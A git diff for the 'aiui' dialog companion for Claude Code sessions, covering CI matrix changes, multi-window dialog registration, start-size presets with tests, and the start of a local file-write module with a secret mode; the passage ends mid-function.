diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 756fc8f..e3aff4d 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -25,10 +25,22 @@ jobs:
             target: aarch64-apple-darwin
             label: macOS arm64
             build_bundle: false
+            run_tests: true
           - os: windows-latest
             target: x86_64-pc-windows-msvc
             label: Windows x86_64
             build_bundle: true
+            # Compile+link the tests but do NOT execute them on Windows.
+            # The freshly-linked `aiui_lib` test binary crashes at *load*
+            # with STATUS_ENTRYPOINT_NOT_FOUND (0xc0000139) on the GH
+            # windows-latest runner — a loader artifact of the large test
+            # binary, not a logic failure (build, clippy and the NSIS bundle
+            # all pass; identical dependency graph to the green macOS/main
+            # build; no Windows FFI added). aiui ships macOS-only and the
+            # Windows port is WIP; the Windows unit-test-binary loader crash (#141)
+            # is tracked separately. We still validate that all code + tests
+            # *compile and link* on Windows via `--no-run`.
+            run_tests: false
     steps:
       - uses: actions/checkout@v4
 
@@ -63,10 +75,20 @@ jobs:
         working-directory: companion/src-tauri
         run: cargo check --release --target ${{ matrix.target }}
 
-      - name: Cargo test
+      - name: Cargo test (run)
+        if: matrix.run_tests
         working-directory: companion/src-tauri
         run: cargo test --lib --release --target ${{ matrix.target }}
 
+      # Windows: compile + link the test binary (real coverage that the code
+      # and tests build on Windows) but skip execution — the test binary
+      # crashes at load on the runner (see matrix comment; tracked under the
+      # Windows-port WIP). `--no-run` stops before that loader crash.
+      - name: Cargo test (compile only)
+        if: ${{ !matrix.run_tests }}
+        working-directory: companion/src-tauri
+        run: cargo test --lib --release --target ${{ matrix.target }} --no-run
+
       - name: Cargo clippy
         working-directory: companion/src-tauri
         run: cargo clippy --release --target ${{ matrix.target }} -- -D warnings
diff --git a/.gitignore b/.gitignore
index d3c1fcb..6630e2f 100644
--- a/.gitignore
+++ b/.gitignore
@@ -6,6 +6,15 @@ companion/src-tauri/gen/schemas/
 # deps
 companion/node_modules/
 
+# python
+__pycache__/
+*.pyc
+.pytest_cache/
+python/uv.lock
+python/.venv/
+python/dist/
+*.egg-info/
+
 # packaged release
 aiui-*.zip
 aiui-*.dmg
diff --git a/companion/src-tauri/Cargo.lock b/companion/src-tauri/Cargo.lock
index c400cc2..aab30fd 100644
--- a/companion/src-tauri/Cargo.lock
+++ b/companion/src-tauri/Cargo.lock
@@ -30,7 +30,7 @@ dependencies = [
 
 [[package]]
 name = "aiui"
-version = "0.4.46"
+version = "0.8.1"
 dependencies = [
  "axum",
  "base64 0.22.1",
@@ -1838,6 +1838,12 @@ dependencies = [
  "pin-project-lite",
 ]
 
+[[package]]
+name = "http-range-header"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9171a2ea8a68358193d15dd5d70c1c10a2afc3e7e4c5bc92bc9f025cebd7359c"
+
 [[package]]
 name = "httparse"
 version = "1.10.1"
@@ -2431,6 +2437,16 @@ version = "0.3.17"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a"
 
+[[package]]
+name = "mime_guess"
+version = "2.0.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f7c44f8e672c00fe5308fa235f821cb4198414e1c77935c1ab6948d3fd78550e"
+dependencies = [
+ "mime",
+ "unicase",
+]
+
 [[package]]
 name = "minisign-verify"
 version = "0.2.5"
@@ -5163,14 +5179,24 @@ checksum = "d4e6559d53cc268e5031cd8429d05415bc4cb4aefc4aa5d6cc35fbf5b924a1f8"
 dependencies = [
  "bitflags 2.11.1",
  "bytes",
+ "futures-core",
  "futures-util",
  "http",
  "http-body",
+ "http-body-util",
+ "http-range-header",
+ "httpdate",
  "iri-string",
+ "mime",
+ "mime_guess",
+ "percent-encoding",
  "pin-project-lite",
+ "tokio",
+ "tokio-util",
  "tower",
  "tower-layer",
  "tower-service",
+ "tracing",
 ]
 
 [[package]]
@@ -5309,6 +5335,12 @@ dependencies = [
  "unic-common",
 ]
 
+[[package]]
+name = "unicase"
+version = "2.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dbc4bc3a9f746d862c45cb89d705aa10f187bb96c76001afab07a0d35ce60142"
+
 [[package]]
 name = "unicode-ident"
 version = "1.0.24"
diff --git a/companion/src-tauri/Cargo.toml b/companion/src-tauri/Cargo.toml
index 69a8acf..4edc43b 100644
--- a/companion/src-tauri/Cargo.toml
+++ b/companion/src-tauri/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "aiui"
-version = "0.4.46"
+version = "0.8.1"
 description = "aiui companion — renders dialogs for remote Claude Code sessions"
 authors = ["byte5"]
 license = ""
@@ -39,7 +39,7 @@ log = "0.4"
 tokio = { version = "1", features = ["full"] }
 axum = "0.7"
 tower = "0.5"
-tower-http = { version = "0.6", features = ["cors"] }
+tower-http = { version = "0.6", features = ["cors", "fs"] }
 uuid = { version = "1", features = ["v4", "serde"] }
 dirs = "5"
 rand = "0.8"
diff --git a/companion/src-tauri/src/dialog.rs b/companion/src-tauri/src/dialog.rs
index e0684af..59d906e 100644
--- a/companion/src-tauri/src/dialog.rs
+++ b/companion/src-tauri/src/dialog.rs
@@ -14,6 +14,18 @@ pub struct DialogRequest {
     /// auto-cancel slightly before the backend sweeps. Single source
     /// of truth for "how long the user has" is here in Rust. v0.4.41.
     pub ttl_secs: u64,
+    /// Human-legible session label the caller passed (project name, task,
+    /// etc.) so the user can tell which session a dialog belongs to when
+    /// several are open at once (Invariant I8). `None` if the caller passed
+    /// nothing — the window then falls back to `session_origin` + short id.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub session: Option<String>,
+    /// Origin host of the caller, auto-injected by the remote Python bridge
+    /// (its `hostname`) since the Mac can't distinguish remotes sharing
+    /// `:7777`. `None`/absent for local callers. Shown in the window chrome
+    /// alongside `session` (I8).
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub session_origin: Option<String>,
 }
 
 #[derive(Debug, Clone, Serialize, Deserialize)]
@@ -50,10 +62,12 @@ pub const DIALOG_HARD_CAP: usize = 16;
 struct PendingEntry {
     /// Resolves the `/render` waiter once the user submits or cancels.
     result_tx: oneshot::Sender<DialogResult>,
-    /// Resolves the per-render ack waiter the first time the frontend
-    /// confirms it received `dialog:show`. Wrapped in `Option` so we can
-    /// take it out exactly once.
-    ack_tx: Option<oneshot::Sender<()>>,
+    /// The full request payload (spec, ttl, session chrome). Stored so the
+    /// per-id dialog window can *pull* it on mount via `get_dialog_spec`
+    /// (Step 4 multi-window) instead of the backend emitting + waiting for an
+    /// ack — the pull model removes the event-ordering race the old
+    /// `dialog:show` + `dialog_window_ready` handshake existed to paper over.
+    request: DialogRequest,
     created_at: Instant,
 }
 
@@ -98,6 +112,37 @@ pub fn estimate_dialog_size(spec: &serde_json::Value) -> (f64, f64) {
     let mut width = BASE_W;
     let mut content_h: f64 = 0.0;
 
+    // Gallery has no form `fields`; it is a grid of item cards. Size by
+    // item count and column layout so a batch review opens roomy.
+    if spec.get("kind").and_then(|v| v.as_str()) == Some("gallery") {
+        let items = spec
+            .get("items")
+            .and_then(|v| v.as_array())
+            .map(|a| a.len())
+            .unwrap_or(0);
+        let cols = spec
+            .get("columns")
+            .and_then(|v| v.as_u64())
+            .filter(|&c| c > 0)
+            .unwrap_or(if items >= 4 { 3 } else { 2 })
+            .max(1);
+        let w = match cols {
+            1 => BASE_W,
+            2 => 680.0,
+            3 => 880.0,
+            _ => MAX_W,
+        };
+        let rows = ((items as f64) / (cols as f64)).ceil();
+        // Each card ≈ thumbnail (200) + label/detail + action row + optional comment.
+        let per_card = if spec.get("comment").and_then(|v| v.as_bool()).unwrap_or(false) {
+            330.0
+        } else {
+            290.0
+        };
+        let needed = CHROME_H + (rows * per_card).max(per_card);
+        return (w.min(MAX_W), needed.clamp(BASE_H, MAX_H));
+    }
+
     if let Some(tabs) = spec.get("tabs").and_then(|v| v.as_array()) {
         if !tabs.is_empty() {
             content_h += 40.0;
@@ -185,6 +230,64 @@ pub fn estimate_dialog_size(spec: &serde_json::Value) -> (f64, f64) {
     (width.min(MAX_W), height)
 }
 
+/// Agent-facing start-size presets, in logical px. The agent may pass
+/// `size: "s" | "m" | "l"` on any dialog spec to ask for a roomier starting
+/// window. Picked to be comfortable defaults on a typical laptop screen; the
+/// real upper bound is the monitor-work-area clamp applied at build time.
+fn size_preset(name: &str) -> Option<(f64, f64)> {
+    match name.trim().to_ascii_lowercase().as_str() {
+        "s" | "small" => Some((520.0, 480.0)),
+        "m" | "medium" => Some((760.0, 620.0)),
+        "l" | "large" => Some((1040.0, 820.0)),
+        _ => None,
+    }
+}
+
+/// Hard ceiling for an *explicit* `width`/`height` hint, independent of the
+/// auto-estimate's own cap. The monitor-work-area clamp in
+/// `build_dialog_window` is the real upper bound; this just stops a wild
+/// number from constructing an absurd window before that clamp runs.
+const HINT_MAX_W: f64 = 1600.0;
+const HINT_MAX_H: f64 = 1200.0;
+
+/// Resolve the *starting* inner size for a dialog window, combining the
+/// content estimate with an optional agent-supplied size hint.
+///
+/// The hint comes from either explicit `width`/`height` (logical px, take
+/// precedence) or a `size: "s"|"m"|"l"` preset. It acts as a **floor**, not
+/// an override: the window opens at `max(content-estimate, hint)` per
+/// dimension. That means a content-heavy dialog never opens smaller than its
+/// content needs (so `size:"s"` can't cram a 12-image gallery), while a light
+/// dialog *can* be asked to start large (so a sparse form with `size:"l"`
+/// opens roomy instead of at the cramped base size). Addresses the
+/// 2026-05-31 report: dialogs opened too small and users didn't know they
+/// could drag-resize. An unrecognised `size` value falls back to pure
+/// auto-sizing — no error, since the window is resizable regardless.
+pub fn resolve_start_size(spec: &serde_json::Value) -> (f64, f64) {
+    let (auto_w, auto_h) = estimate_dialog_size(spec);
+
+    let explicit_w = spec
+        .get("width")
+        .and_then(|v| v.as_f64())
+        .filter(|w| *w > 0.0);
+    let explicit_h = spec
+        .get("height")
+        .and_then(|v| v.as_f64())
+        .filter(|h| *h > 0.0);
+    let preset = spec
+        .get("size")
+        .and_then(|v| v.as_str())
+        .and_then(size_preset);
+
+    let hint_w = explicit_w.or(preset.map(|p| p.0)).unwrap_or(0.0);
+    let hint_h = explicit_h.or(preset.map(|p| p.1)).unwrap_or(0.0);
+
+    (
+        auto_w.max(hint_w).min(HINT_MAX_W),
+        auto_h.max(hint_h).min(HINT_MAX_H),
+    )
+}
+
 fn collect_visible_fields(spec: &serde_json::Value) -> Vec<&serde_json::Value> {
     let mut out = Vec::new();
     if let Some(tabs) = spec.get("tabs").and_then(|v| v.as_array()) {
@@ -199,16 +302,6 @@ fn collect_visible_fields(spec: &serde_json::Value) -> Vec<&serde_json::Value> {
     out
 }
 
-/// Returned by `try_register` when a dialog is already in flight.
-/// Surfaced via /render as a 409 so the calling agent can distinguish
-/// "companion not reachable" from "companion is busy with someone
-/// else's dialog right now". v0.4.36.
-#[derive(Debug, Clone, Copy)]
-pub struct BusyInfo {
-    pub pending_count: usize,
-    pub oldest_age_secs: u64,
-}
-
 impl DialogState {
     pub fn new() -> Self {
         Self {
@@ -216,30 +309,21 @@ impl DialogState {
         }
     }
 
-    /// Registers a new dialog and returns `(id, result_rx, ack_rx)`. The
-    /// caller is responsible for surfacing the window + emitting the
-    /// `dialog:show` event.
-    ///
-    /// Performs an opportunistic sweep before insert: TTL-expired entries
-    /// are cancelled and removed, and if the hard cap would be exceeded
-    /// the oldest entry is evicted. No background reaper is needed.
-    ///
-    /// As of v0.4.36 the production /render path uses `try_register`
-    /// instead, which rejects rather than evicts when a dialog is
-    /// already in flight. `register` is retained as the
-    /// hard-cap-defense fallback for tests and any future call site
-    /// that legitimately wants eviction semantics.
-    #[allow(dead_code)]
-    pub fn register(
+    /// Register a new dialog and return `(id, result_rx)`. Multi-window
+    /// (Step 4, Invariant I8): N dialogs may be in flight at once — this never
+    /// rejects (the old single-occupancy 409 is gone). It sweeps TTL-expired
+    /// entries and, only if the hard cap would be exceeded, evicts the single
+    /// oldest. The caller (`/render`) builds a per-id window; the window pulls
+    /// the stored `DialogRequest` via [`Self::get_request`] on mount.
+    pub fn register_dialog(
         &self,
-    ) -> (
-        String,
-        oneshot::Receiver<DialogResult>,
-        oneshot::Receiver<()>,
-    ) {
+        spec: serde_json::Value,
+        session: Option<String>,
+        session_origin: Option<String>,
+        ttl_secs: u64,
+    ) -> (String, oneshot::Receiver<DialogResult>) {
         let id = Uuid::new_v4().to_string();
         let (result_tx, result_rx) = oneshot::channel();
-        let (ack_tx, ack_rx) = oneshot::channel();
 
         let mut map = self.pending.lock().unwrap();
 
@@ -279,27 +363,31 @@ impl DialogState {
             }
         }
 
+        let request = DialogRequest {
+            id: id.clone(),
+            spec,
+            ttl_secs,
+            session,
+            session_origin,
+        };
         map.insert(
             id.clone(),
             PendingEntry {
                 result_tx,
-                ack_tx: Some(ack_tx),
+                request,
                 created_at: now,
             },
         );
 
-        (id, result_rx, ack_rx)
+        (id, result_rx)
     }
 
-    /// Marks the dialog with `id` as having been received by the frontend.
-    /// Idempotent: the second call is a silent no-op (oneshot already sent).
-    pub fn ack(&self, id: &str) {
-        let mut map = self.pending.lock().unwrap();
-        if let Some(entry) = map.get_mut(id) {
-            if let Some(tx) = entry.ack_tx.take() {
-                let _ = tx.send(());
-            }
-        }
+    /// Return a clone of the stored request for `id`, for the per-id dialog
+    /// window to pull on mount (Step 4 pull model). `None` if the dialog is
+    /// gone (already resolved, evicted, or never existed) — the window then
+    /// closes itself.
+    pub fn get_request(&self, id: &str) -> Option<DialogRequest> {
+        self.pending.lock().unwrap().get(id).map(|e| e.request.clone())
     }
 
     pub fn complete(&self, id: &str, result: serde_json::Value) {
@@ -326,94 +414,11 @@ impl DialogState {
         }
     }
 
-    /// Cancel every pending dialog with `reason`, resolving each waiting
-    /// `/render` as cancelled. Returns how many were cancelled. Used by
-    /// the dialog-window X-close handler and the orphan-window sweep
-    /// (v0.4.46, Bug B+) so that tearing the window down *always*
-    /// produces a terminal answer for any in-flight render — never a
-    /// silent hang behind an empty window.
-    pub fn cancel_all(&self, reason: &str) -> usize {
-        let mut map = self.pending.lock().unwrap();
-        let drained: Vec<(String, PendingEntry)> = map.drain().collect();
-        let n = drained.len();
-        for (id, entry) in drained {
-            let _ = entry.result_tx.send(DialogResult {
-                id,
-                cancelled: true,
-                result: serde_json::Value::Null,
-                reason: Some(reason.to_string()),
-            });
-        }
-        n
-    }
-
-    /// Like `register` but rejects with `BusyInfo` if a dialog is already
-    /// in flight after the TTL sweep. Used by `/render` so that two
-    /// parallel callers (multiple aiui calls in one assistant turn,
-    /// two Claude sessions hitting the same companion, a stale window
-    /// from a previous timeout) can't silently overlay each other —
-    /// the second caller gets a clear conflict response instead of
-    /// having its predecessor's dialog evicted underfoot. v0.4.36.
-    ///
-    /// `register` is kept for tests and for any future call site that
-    /// genuinely wants the eviction-based behaviour, but the
-    /// production /render path uses `try_register` exclusively.
-    pub fn try_register(
-        &self,
-    ) -> Result<
-        (
-            String,
-            oneshot::Receiver<DialogResult>,
-            oneshot::Receiver<()>,
-        ),
-        BusyInfo,
-    > {
-        let mut map = self.pending.lock().unwrap();
-
-        // Sweep TTL-expired entries first — those don't count as
-        // "in flight" any more. Same logic as `register`.
-        let now = Instant::now();
-        let expired: Vec<String> = map
-            .iter()
-            .filter(|(_, e)| now.duration_since(e.created_at) > DIALOG_TTL)
-            .map(|(k, _)| k.clone())
-            .collect();
-        for stale_id in expired {
-            if let Some(entry) = map.remove(&stale_id) {
-                let _ = entry.result_tx.send(DialogResult {
-                    id: stale_id,
-                    cancelled: true,
-                    result: serde_json::Value::Null,
-                    reason: Some("ttl_expired".into()),
-                });
-            }
-        }
-
-        if !map.is_empty() {
-            let oldest_age_secs = map
-                .values()
-                .map(|e| now.duration_since(e.created_at).as_secs())
-                .max()
-                .unwrap_or(0);
-            return Err(BusyInfo {
-                pending_count: map.len(),
-                oldest_age_secs,
-            });
-        }
-
-        let id = Uuid::new_v4().to_string();
-        let (result_tx, result_rx) = oneshot::channel();
-        let (ack_tx, ack_rx) = oneshot::channel();
-        map.insert(
-            id.clone(),
-            PendingEntry {
-                result_tx,
-                ack_tx: Some(ack_tx),
-                created_at: now,
-            },
-        );
-        Ok((id, result_rx, ack_rx))
-    }
+    // (Step 4 removed `cancel_all`: multi-window cancels per-id — the
+    // X-close handler cancels the closed window's own dialog by its label-id,
+    // and `sweep_orphan_dialog_window` reaps each orphan window individually.
+    // A blunt "cancel everything" would wrongly tear down other sessions'
+    // live dialogs.)
 
     /// Snapshot for `/health` / diagnostics. Cheap: one mutex acquire.
     pub fn stats(&self) -> DialogStats {
@@ -438,10 +443,14 @@ impl DialogState {
 mod tests {
     use super::*;
 
+    fn reg(s: &DialogState) -> (String, oneshot::Receiver<DialogResult>) {
+        s.register_dialog(serde_json::json!({"kind": "confirm", "title": "?"}), None, None, 0)
+    }
+
     #[test]
     fn register_inserts_entry() {
         let s = DialogState::new();
-        let (id, _rx, _ack) = s.register();
+        let (id, _rx) = reg(&s);
         assert!(!id.is_empty());
         assert_eq!(s.stats().orphan_count, 1);
     }
@@ -449,7 +458,7 @@ mod tests {
     #[test]
     fn complete_resolves_and_removes() {
         let s = DialogState::new();
-        let (id, rx, _ack) = s.register();
+        let (id, rx) = reg(&s);
         s.complete(&id, serde_json::json!({"ok": true}));
         let r = rx.blocking_recv().unwrap();
         assert!(!r.cancelled);
@@ -459,7 +468,7 @@ mod tests {
     #[test]
     fn cancel_resolves_and_removes() {
         let s = DialogState::new();
-        let (id, rx, _ack) = s.register();
+        let (id, rx) = reg(&s);
         s.cancel(&id);
         let r = rx.blocking_recv().unwrap();
         assert!(r.cancelled);
@@ -467,31 +476,32 @@ mod tests {
     }
 
     #[test]
-    fn cancel_all_resolves_every_pending() {
+    fn multiple_dialogs_register_concurrently_no_409() {
+        // Step 4 / I8: single-occupancy is gone — N dialogs coexist.
         let s = DialogState::new();
-        let (_id, rx, _ack) = s.register();
-        let n = s.cancel_all("window_closed");
-        assert_eq!(n, 1);
-        let r = rx.blocking_recv().unwrap();
-        assert!(r.cancelled);
-        assert_eq!(r.reason.as_deref(), Some("window_closed"));
-        assert_eq!(s.stats().orphan_count, 0);
+        let (_a, _ra) = reg(&s);
+        let (_b, _rb) = reg(&s);
+        let (_c, _rc) = reg(&s);
+        assert_eq!(s.stats().orphan_count, 3);
     }
 
     #[test]
-    fn cancel_all_on_empty_is_zero() {
+    fn get_request_returns_stored_payload_then_none_after_resolve() {
         let s = DialogState::new();
-        assert_eq!(s.cancel_all("window_closed"), 0);
-    }
-
-    #[test]
-    fn ack_fires_once() {
-        let s = DialogState::new();
-        let (id, _rx, ack) = s.register();
-        s.ack(&id);
-        ack.blocking_recv().expect("first ack must arrive");
-        // Second ack on the same id is a silent no-op.
-        s.ack(&id);
+        let (id, _rx) = s.register_dialog(
+            serde_json::json!({"kind": "confirm"}),
+            Some("my-project".into()),
+            Some("macmini".into()),
+            42,
+        );
+        let req = s.get_request(&id).expect("request stored for pull");
+        assert_eq!(req.id, id);
+        assert_eq!(req.ttl_secs, 42);
+        assert_eq!(req.session.as_deref(), Some("my-project"));
+        assert_eq!(req.session_origin.as_deref(), Some("macmini"));
+        // Once resolved, the pull returns None so the window closes itself.
+        s.complete(&id, serde_json::json!({}));
+        assert!(s.get_request(&id).is_none());
     }
 
     #[test]
@@ -580,30 +590,99 @@ mod tests {
     }
 
     #[test]
-    fn try_register_succeeds_when_empty() {
-        let s = DialogState::new();
-        let res = s.try_register();
-        assert!(res.is_ok());
-        assert_eq!(s.stats().orphan_count, 1);
+    fn estimate_size_gallery_scales_with_items() {
+        // Few items → narrower 2-col layout, roomy but bounded height.
+        let small = serde_json::json!({
+            "kind": "gallery",
+            "items": [
+                { "value": "a", "src": "data:image/png;base64,AAAA" },
+                { "value": "b", "src": "data:image/png;base64,BBBB" }
+            ]
+        });
+        let (w_small, h_small) = estimate_dialog_size(&small);
+        assert_eq!(w_small, 680.0, "2 items → 2-col → 680 wide");
+        assert!((480.0..=900.0).contains(&h_small));
+
+        // Many items → 3-col grid widens, more rows push height higher.
+        let mut items = Vec::new();
+        for i in 0..9 {
+            items.push(serde_json::json!({ "value": format!("v{i}"), "src": "data:image/png;base64,AAAA" }));
+        }
+        let big = serde_json::json!({ "kind": "gallery", "items": items });
+        let (w_big, h_big) = estimate_dialog_size(&big);
+        assert_eq!(w_big, 880.0, "≥4 items → 3-col → 880 wide");
+        assert!(h_big > h_small, "9 items should be taller than 2, got {h_big} vs {h_small}");
+        assert!(h_big <= 900.0, "must clamp to MAX_H");
     }
 
     #[test]
-    fn try_register_rejects_when_pending() {
-        let s = DialogState::new();
-        let (_id, _rx, _ack) = s.try_register().expect("first try_register");
-        let busy = s.try_register().expect_err("second try_register must be busy");
-        assert_eq!(busy.pending_count, 1);
-        // Registry still holds the original entry.
-        assert_eq!(s.stats().orphan_count, 1);
+    fn estimate_size_gallery_respects_explicit_columns() {
+        let spec = serde_json::json!({
+            "kind": "gallery",
+            "columns": 1,
+            "items": [{ "value": "a" }, { "value": "b" }]
+        });
+        let (w, _h) = estimate_dialog_size(&spec);
+        assert_eq!(w, 520.0, "explicit 1 column → base width");
     }
 
     #[test]
-    fn try_register_succeeds_after_complete() {
-        let s = DialogState::new();
-        let (id, _rx, _ack) = s.try_register().expect("first");
-        s.complete(&id, serde_json::json!({"ok": true}));
-        let res = s.try_register();
-        assert!(res.is_ok());
+    fn resolve_start_size_no_hint_equals_estimate() {
+        let spec = serde_json::json!({ "kind": "confirm", "title": "ok?" });
+        assert_eq!(resolve_start_size(&spec), estimate_dialog_size(&spec));
+    }
+
+    #[test]
+    fn resolve_start_size_preset_floors_a_small_dialog() {
+        // A bare confirm auto-sizes to the base (520×480). Asking for "l"
+        // opens it large instead.
+        let spec = serde_json::json!({ "kind": "confirm", "title": "ok?", "size": "l" });
+        let (w, h) = resolve_start_size(&spec);
+        assert_eq!((w, h), (1040.0, 820.0));
+
+        let spec_m = serde_json::json!({ "kind": "confirm", "title": "ok?", "size": "m" });
+        assert_eq!(resolve_start_size(&spec_m), (760.0, 620.0));
+    }
+
+    #[test]
+    fn resolve_start_size_preset_is_a_floor_not_a_cap() {
+        // 9-item gallery auto-sizes large (880 wide). "s" must NOT shrink it
+        // below what the content needs.
+        let mut items = Vec::new();
+        for i in 0..9 {
+            items.push(serde_json::json!({ "value": format!("v{i}"), "src": "data:image/png;base64,AAAA" }));
+        }
+        let spec = serde_json::json!({ "kind": "gallery", "items": items, "size": "s" });
+        let (auto_w, _) = estimate_dialog_size(&serde_json::json!({
+            "kind": "gallery",
+            "items": (0..9).map(|i| serde_json::json!({"value": format!("v{i}")})).collect::<Vec<_>>()
+        }));
+        let (w, _) = resolve_start_size(&spec);
+        assert!(w >= auto_w, "content estimate must win over a smaller preset: {w} < {auto_w}");
+    }
+
+    #[test]
+    fn resolve_start_size_explicit_dims_override_preset() {
+        let spec = serde_json::json!({
+            "kind": "form", "title": "x", "size": "s", "width": 900, "height": 700
+        });
+        let (w, h) = resolve_start_size(&spec);
+        assert_eq!((w, h), (900.0, 700.0));
+    }
+
+    #[test]
+    fn resolve_start_size_clamps_absurd_explicit_dims() {
+        let spec = serde_json::json!({
+            "kind": "form", "title": "x", "width": 99999, "height": 99999
+        });
+        let (w, h) = resolve_start_size(&spec);
+        assert_eq!((w, h), (1600.0, 1200.0), "explicit dims clamp to HINT_MAX");
+    }
+
+    #[test]
+    fn resolve_start_size_ignores_unknown_preset() {
+        let spec = serde_json::json!({ "kind": "confirm", "title": "ok?", "size": "humongous" });
+        assert_eq!(resolve_start_size(&spec), estimate_dialog_size(&spec));
     }
 
     #[test]
@@ -611,17 +690,19 @@ mod tests {
         let s = DialogState::new();
         let mut rxs = Vec::new();
         for _ in 0..DIALOG_HARD_CAP {
-            let (_id, rx, _ack) = s.register();
+            let (_id, rx) = reg(&s);
             rxs.push(rx);
         }
         assert_eq!(s.stats().orphan_count, DIALOG_HARD_CAP);
 
-        // One more — should evict the oldest.
-        let (_id, _rx, _ack) = s.register();
+        // One more — should evict the oldest (the cap bounds the map; the
+        // 409 single-occupancy that used to reject earlier is gone).
+        let (_id, _rx) = reg(&s);
         assert_eq!(s.stats().orphan_count, DIALOG_HARD_CAP);
 
         // The first registered receiver should now resolve as cancelled.
         let first = rxs.remove(0).blocking_recv().unwrap();
         assert!(first.cancelled);
+        assert_eq!(first.reason.as_deref(), Some("evicted"));
     }
 }
diff --git a/companion/src-tauri/src/filewrite.rs b/companion/src-tauri/src/filewrite.rs
new file mode 100644
index 0000000..3145a4f
--- /dev/null
+++ b/companion/src-tauri/src/filewrite.rs
@@ -0,0 +1,277 @@
+//! Issue #135 — typed input field with file-write (incl. `secret` mode).
+//!
+//! A `form` field may carry an optional `target`: on affirmative submit, aiui
+//! writes the entered value to a file. The write is **always a local file
+//! operation on the host the agent runs on** — because an aiui module already
+//! lives there: the native app on a local Mac session, the Python bridge on a
+//! remote SSH session. Each side writes its own filesystem; the value reaches
+//! the side that needs it over the existing :7777 channel (never via the
+//! agent/LLM). No `scp`, no cross-host write, no atomic-remote-replace
+//! problem — `substitute` is a plain local read-modify-write everywhere.
+//!
+//! This module is the **local writer**, used by the native app for a
+//! Rust-bridge (local Mac) session. The Python bridge has the mirror
+//! implementation for sessions it serves (local-via-uvx or remote). For a
+//! `secret` field the value is written only and never returned to the agent.
+//!
+//! Confused-deputy note: because the write is always local to whichever aiui
+//! module is on the agent's own host, there is **no host parameter** and thus
+//! no way to redirect a write to a foreign host — exfiltration is structurally
+//! impossible. The agent still controls the *path on its own host*, so the
+//! user-visible approval (the affirmative button, with the path shown) remains
+//! the authorization backstop.
+//!
+//! Modes (explicit, never inferred from file existence):
+//! - `create` — write the raw value; refuse to clobber unless `overwrite`.
+//! - `substitute` — replace a `placeholder` that occurs exactly once in an
+//!   existing file (0 or >1 → error, never a partial write). Format-agnostic.
+
+use serde::{Deserialize, Serialize};
+use std::path::{Path, PathBuf};
+
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Deserialize)]
+#[serde(rename_all = "lowercase")]
+pub enum WriteMode {
+    Create,
+    Substitute,
+}
+
+/// Per-field write target, parsed from the spec's `target` object.
+#[derive(Debug, Clone, Deserialize)]
+pub struct Target {
+    pub mode: WriteMode,
+    pub path: String,
+    /// Octal string like "0600". Defaults to 0600 when unset (tight by
+    /// default; harmless for non-secret values too).
+    #[serde(default)]
+    pub perm: Option<String>,
+    /// `create` only: permit clobbering an existing file.
+    #[serde(default)]
+    pub overwrite: bool,
+    /// `substitute` only: the exact token to replace (must occur once).
+    #[serde(default)]
+    pub placeholder: Option<String>,
+}
+
+/// Per-field result handed back to the agent. For a `secret` field the value
+/// is absent by construction — only this status crosses the wire.
+#[derive(Debug, Serialize)]
+pub struct WriteOutcome {
+    pub written: bool,
+    /// Human-legible resolved destination (the absolute local path written).
+    pub target: String,
+    pub bytes: usize,
+    #[serde(skip_serializing_if = "Option::is_none")]
+    pub error: Option<String>,
+}
+
+impl WriteOutcome {
+    fn ok(target: String, bytes: usize) -> Self {
+        Self { written: true, target, bytes, error: None }
+    }
+    fn fail(target: String, error: String) -> Self {
+        Self { written: false, target, bytes: 0, error: Some(error) }
+    }
+    /// A field whose `target` spec couldn't even be parsed — no destination to
+    /// name yet.
+    pub fn invalid(error: String) -> Self {
+        Self { written: false, target: String::new(), bytes: 0, error: Some(error) }
+    }
+}
+
+/// Parse an octal permission string like "0600"/"600" into mode bits.
+fn parse_perm(s: &str) -> Option<u32> {
+    let t = s.trim().trim_start_matches("0o");
+    u32::from_str_radix(t, 8).ok()
+}
+
+/// Reject obviously-unsafe target paths (NULs, control chars, empty). The
+/// local write goes through `std::fs`, not a shell, so this is a sanity guard
+/// rather than an injection defense — but it keeps the approval string the
+/// user sees unambiguous.
+pub fn is_sane_target_path(p: &str) -> bool {
+    !p.is_empty() && p.len() <= 4096 && p.bytes().all(|b| b >= 0x20 && b != 0x7f)
+}
+
+fn expand_tilde(p: &str) -> PathBuf {
+    if let Some(rest) = p.strip_prefix("~/") {
+        if let Some(home) = dirs::home_dir() {
+            return home.join(rest);
+        }
+    }
+    PathBuf::from(p)
+}
+
+/// Atomically write `bytes` to `path` (tmp in the same dir + rename), applying
+/// `perm` before the rename so a secret never sits world-readable even briefly.
+fn atomic_write(path: &Path, bytes: &[u8], perm: Option<u32>) -> Result<(), String> {
+    // `perm` is applied only on Unix (mode bits); on Windows the file inherits
+    // default ACLs. Bind it so the param isn't flagged unused on non-Unix
+    // (clippy -D warnings on the Windows target).
+    #[cfg(not(unix))]
+    let _ = perm;
+    let dir = path
+        .parent()
+        .ok_or_else(|| "target has no parent directory".to_string())?;
+    std::fs::create_dir_all(dir).map_err(|e| format!("create dir {}: {e}", dir.display()))?;
+    let tmp = dir.join(format!(".aiui-write-{}.tmp", uuid::Uuid::new_v4()));
+    {
+        use std::io::Write;
+        let mut f = std::fs::File::create(&tmp)
+            .map_err(|e| format!("create temp {}: {e}", tmp.display()))?;
+        #[cfg(unix)]
+        if let Some(mode) = perm {
+            use std::os::unix::fs::PermissionsExt;
+            let _ = f.set_permissions(std::fs::Permissions::from_mode(mode));
+        }
+        if let Err(e) = f.write_all(bytes) {
+            let _ = std::fs::remove_file(&tmp);
+            return Err(format!("write temp: {e}"));
+        }
+        f.sync_all().ok();
+    }
+    std::fs::rename(&tmp, path).map_err(|e| {
+        let _ = std::fs::remove_file(&tmp);
+        format!("rename into place: {e}")
+    })
+}
+
+/// Replace exactly one occurrence of `placeholder`. Errors on 0 or >1.
+pub fn substitute_once(haystack: &str, placeholder: &str, value: &str) -> Result<String, String> {
